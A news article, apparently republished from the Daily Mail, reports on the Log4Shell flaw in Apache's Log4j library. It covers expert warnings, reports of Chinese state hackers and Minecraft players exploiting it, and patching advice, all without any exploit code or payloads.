Chinese hackers are already exploiting ‘fully weaponised’ Log4shell software vulnerability | Daily Mail Online

Chinese hackers are already exploiting 'fully weaponised' Log4shell software vulnerability | Daily Mail Online

Chinese hackers are already exploiting a ‘fully weaponised’ software vulnerability which is causing mayhem on the web, with experts warning that it poses a threat to internet-connected devices across the globe. 

The vulnerability comes from Apache’s Log4j, a popular open source library that helps software developers track changes in applications that they build. 

Experts have said the ‘Log4shell’ flaw is the biggest threat in the history of modern computing, with countries issuing critical warnings over the vulnerability that allows criminals to steal personal data, plant malicious software or hijack card details.

Hundreds of millions of devices could be exposed to the vulnerability.

Any computer that’s connected to a server that uses an unpatched version of the software is open to attack from hackers, who could use it to access a company’s internal network, for example. 

‘The Apache Log4j Remote Code Execution Vulnerability is the single biggest, most critical vulnerability of the last decade,’ said Amit Yoran, chief executive of network security firm Tenable and founder of the US Computer Emergency Readiness Team. 

Juan Andres Guerrero-Saade, principal threat researcher with cybersecurity firm SentinelOne, called it ‘one of those nightmare vulnerabilities that there’s pretty much no way to prepare for.’

Guerrero-Saade said his firm had already seen Chinese hacking groups moving to take advantage of the vulnerability. 

US cybersecurity firms Mandiant and Crowdstrike also said they found sophisticated hacking groups leveraging the bug to breach targets. Mandiant described those hackers as ‘Chinese government actors’ in an email to Reuters news agency.

Chinese hackers are already exploiting a ‘fully weaponised’ software vulnerability which is causing mayhem on the web, with experts warning that it poses a threat to internet-connected devices across the globe. Pictured: A hacker works on a computer [stock image]

The flaw is considered so serious because the affected software is used in a wide range of devices that use Java software. It is so popular and embedded across many companies’ programs that security executives expect widespread abuse. 

Online services used by millions including Netflix, Amazon, Uber and LinkedIn and cloud-based services such Apple iCloud, Android OS, Google Documents and more are all understood to be under threat from the software bug. 

Tech giants such as Amazon Web Services and IBM have already moved to address the flaw in their products. However, potential attackers had more than a week’s head start before it was made public.

It was first noticed on sites used by users of the popular video game Minecraft, and was officially reported to Apache on November 24 by Chen Zhaojun – an employee of Chinese e-commerce giant Alibaba. 

The US government sent a warning to the private sector about Apache’s Log4j vulnerability and the looming risk it poses on Friday, while Germany has activated its national IT crisis centre in response to the ‘extremely critical’ flaw. 

‘The internet’s on fire right now,’ said Adam Meyers, senior vice president of intelligence at the cybersecurity firm Crowdstrike. ‘People are scrambling to patch,’ he said, ‘and all kinds of people scrambling to exploit it.’

He said Friday morning that in the 12 hours since the bug’s existence was disclosed, it had been ‘fully weaponized,’ meaning malefactors had developed and distributed tools to exploit it.

Everything we know about the ‘Log4Shell’ bug so far

WHAT IS THE PROGRAMMING FLAW? 

An exploit discovered in the Java logging library, log4j2, has sent developers scrambling for a patch.

Java remains one the world’s most popular programming languages and is used to create functions within an app or system. 

HOW WILL IT AFFECT MY DEVICES? 

With the ‘Log4Shell’ bug, hackers can take full control of an external server, without authentication, with relative ease.

Experts have warned it is one of the biggest threats in the history of modern computing.

The following apps or online services are known to use Java within its programming, either through back-end services or user interfaces.

WHAT CAN I DO TO STOP IT? 

News of a potential vulnerability affecting millions of devices has sent programmers scrambling for a fix.

Firewalls and VPNs are likely already working on short-term fixes to protect their customers’ online security.

Experts have suggested all Log4j users should immediately look to upgrade to Log4j-2.15.0-rc2.

Unofficial patches have also been launched by internet sleuths. 

Much of the software affected by Log4j, which bears names like Hadoop or Solr, may be unfamiliar to the public at large. 

But as with the SolarWinds program at the centre of a massive Russian espionage operation last year, the ubiquity of these workhorse programs makes them ideal jumping-off points for digital intruders. 

While a partial fix for the vulnerability was released on Friday by Apache, the maker of Log4j, affected companies and cyber defenders will need time to locate the vulnerable software and properly implement patches.

In practice, this flaw allows an outsider to enter active code into the record-keeping process. That code then tells the server hosting the software to execute a command giving the hacker control.

So far no major disruptive cyber incidents have been publicly documented as a result of the vulnerability, but researchers are seeing an alarming uptick in hacking groups trying to take advantage of the bug for espionage. 

What many experts now fear is that the bug could be used to deploy malware that either destroys data or encrypts it, like what was used against U.S. pipeline operator Colonial Pipeline Co in May which led to shortages of gas in some parts of the US.

Meanwhile, a spokesman for Germany’s Interior Ministry said the country’s federal IT safety agency is urging users to patch their systems as quickly as possible to fend off possible attacks using a bug in the Log4J tool.

‘The threat situation is extremely critical,’ the spokesman, Steve Alter, told reporters in Berlin. ‘Immediate protective measures are required.’

German authorities have recorded efforts to exploit the bug around the world, including successful attempts, he said, without elaborating. So far no successful attacks against German government entities or networks have been confirmed, though a number have been deemed vulnerable, said Alter.

Germany is in contact with ‘numerous national and international partners’ on the matter, he said. ‘A successful exploit of this weakness would mean that someone could take complete control of the affected system.’

Java remains one the world’s most popular programming languages and is used to create functions within an app or system. 

Unless a patch is found, criminals, spies and programming novices could gain easy access to internal networks where they can loot valuable data, plant malware, erase crucial information and much more. [stock image]

It’s still used to this day, either for backend services to user development interfaces, in some of the world’s most popular applications or online services, including Netflix, Amazon, Google and Android OS, Spotify, LinkedIn and Uber. 

With the ‘Log4Shell’ bug, hackers can take full control of an external server, without authentication, with relative ease.  

‘I would be hard-pressed to think of a company that´s not at risk,’ said Joe Sullivan, chief security officer for Cloudflare, whose online infrastructure protects websites from malicious actors.

‘Log4Shell’ was uncovered in a utility that’s ubiquitous in cloud servers and enterprise software used across industry and government. 

Until it is resolved, criminals, spies and programming novices alike are granted easy access to internal networks where they can steal valuable data, plant malware, erase crucial information and much more.

Untold millions of servers have it installed, and experts said the fallout would not be known for several days. Amazon, Twitter and Apple’s iCloud are understood to be ‘vulnerable’ to the exploit.

Hackers are also understood to be able to use QR codes, whose use was widely popularised throughout the pandemic for NHS Test and Trace purposes, to run malicious code on servers. 

The scare prompted senior intelligence experts to react, including Robert Joyce, director of cybersecurity at the National Security Agency in America.

He explained: ‘The Log4j vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks, including the NSA’s GHIDRA (a free open source reverse engineering tool)’. 

The vulnerability, dubbed was rated 10 on a scale of one to 10 the Apache Software Foundation, which oversees development of the software. Anyone with the exploit can obtain full access to an unpatched computer that uses the software.

Experts said the extreme ease with which the vulnerability lets an attacker access a web server – no password required – is what makes it so dangerous.

Marcus Hutchins, an internet security researcher, warned Log4Shell could make millions of apps vulnerable to hacking as its software is often used by developers.  

Cybersecurity experts say users of the online game Minecraft have already exploited it to breach other users’ devices by pasting a short message into in a chat box

New Zealand’s computer emergency response team was among the first to report that the flaw was being ‘actively exploited in the wild’ just hours after it was publicly reported Thursday and a patch released.

The vulnerability, located in open-source Apache software used to run websites and other web services, was reported to the foundation on Nov. 24 by the Chinese tech giant Alibaba, it said. It took two weeks to develop and release a fix.

But patching systems around the world could be a complicated task. 

While most organizations and cloud providers such as Amazon should be able to update their web servers easily, the same Apache software is also often embedded in third-party programs, which often can only be updated by their owners.

The first obvious signs of the flaw’s exploitation appeared in Minecraft, an online game hugely popular with kids and owned by Microsoft. 

Meyers and security expert Marcus Hutchins said Minecraft users were already using it to execute programs on the computers of other users by pasting a short message in a chat box.

Microsoft said it had issued an urgent software patch for Minecraft users. ‘Customers who apply the fix are protected,’ it said.

Researchers reported finding evidence the vulnerability could be exploited in servers run by companies such as Apple, Amazon, Twitter and Cloudflare.

This content was originally published here.

Laat een reactie achter

Het e-mailadres wordt niet gepubliceerd.